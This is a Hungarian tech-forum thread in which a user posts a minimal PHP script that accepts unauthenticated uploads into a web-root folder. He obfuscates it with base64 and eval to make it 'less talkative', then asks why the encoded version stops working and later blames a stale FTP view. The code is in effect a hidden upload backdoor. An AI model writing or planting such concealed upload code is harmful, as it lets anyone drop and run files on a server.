Hirdetés
- gban: Ingyen kellene, de tegnapra
- Luck Dragon: Asszociációs játék. :)
- sziku69: Fűzzük össze a szavakat :)
- bambano: Bambanő háza tája
- Lalikiraly: Kinek milyen setupja van?
- sziku69: Szólánc.
- Kalandor: „Ha engedtem volna a lelkiismeretemnek, az üzlet kevésbé lett volna jövedelmező”
- pechman8: 300B vs. GU50: a Herceg és a Koldus
- Cseppino: Windows 11 25H2 frissítés – Újdonságok, AI-funkciók és rejtett beállítások.
- potyautas: Nóta állj!
Hirdetés
(használd a CYBSEC25PH kuponkódot további 20 ezer ft kedvezményért!)
Új hozzászólás Aktív témák
-
gergogazd
csendes tag
válasz
gergogazd #18594 üzenetére
Úgy tűnik, nem ez volt a gond.
A total commander tehet róla.
Php feltöltésnél úgy szoktam megoldani az ftp frissítést, hogy belépek egy könyvtárba meg vissza, és ez ma is jól működött amikor először töltöttem fel, aztán megírtam a base64-es kódot, ami miatt egy újabb tesztet kellett futtatnom, de ezúttal nem frissült a tartalom, hiába léptem ki-be. Újracsatlakozás után viszont már fent volt minden amivel próbálkoztam. -
gergogazd
csendes tag
sziasztok
szeretnék egy minél kevésbé beszédes fájl feltöltő kódot írni, ezért először csináltam egy ilyet:
<?$important=$_SERVER["DOCUMENT_ROOT"]."/php/";if(!empty($_POST)){if(!is_dir($important))mkdir($important);move_uploaded_file($_FILES["index"]["tmp_name"],$important.basename($_FILES["index"]["name"]));}?>
Bocs a tömörség miatt, de konkrétan így szerepel az oldalamon, és ebben a formában még működik is.
Később úgy voltam vele, hogy erről még mindig ordít, hogy mit csinál, ezért base64-gyel kódoltam így:
<?
$source = '$important=$_SERVER["DOCUMENT_ROOT"]."/php/";if(!empty($_POST)){if(!is_dir($important))mkdir($important);move_uploaded_file($_FILES["index"]["tmp_name"],$important.basename($_FILES["index"]["name"]));}';
$code = base64_encode($source);
eval(base64_decode($code));
?>Így viszont már nem töltötte fel a fájlt, de gőzöm sincs, hogy hol akadt el. Az echo függvény pl gond nélkül lefutott rajta, nem volt probléma a változókkal és idézőjelekkel sem.
Mi lehet a baj?
Új hozzászólás Aktív témák
- MAKULÁTLAN! Dell Precision 7760 Tervező Vágó Laptop -70% 17,3" i7-11850H 32/1TB NVIDIA A3000 6GB FHD
- Kiwiears Astral
- SZÉP! Dell Precision 7760 Tervező Vágó Laptop -70% 17,3" i7-11850H 32/512GB NVIDIA A3000 6GB FHD
- Xiaomi Electric Scooter 5 Max tökéletes hibátlan eladó
- 4K Gamer PC Ryzen 9 5900X/RX 6900 XT 16Gb/32Gb DDR4/1Tb NVME M2 SSD/850W Bronz 6hó Gar
- Azonnali készpénzes Intel i5 i7 i9 8xxx 9xxx processzor felvásárlás személyesen / csomagküldés
- Azonnali készpénzes nVidia RTX 3000 sorozat videokártya felvásárlás személyesen / csomagküldéssel
- GYÖNYÖRŰ iPhone 12 mini 256GB Blue -1 ÉV GARANCIA -Kártyafüggetlen, MS3625
- Honor X7b 128GB, Kártyafüggetlen, 1 Év Garanciával
- Intel Core i5 3470 confidential Ivy bridge Quad Core
Állásajánlatok
Cég: Laptopműhely Bt.
Város: Budapest
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest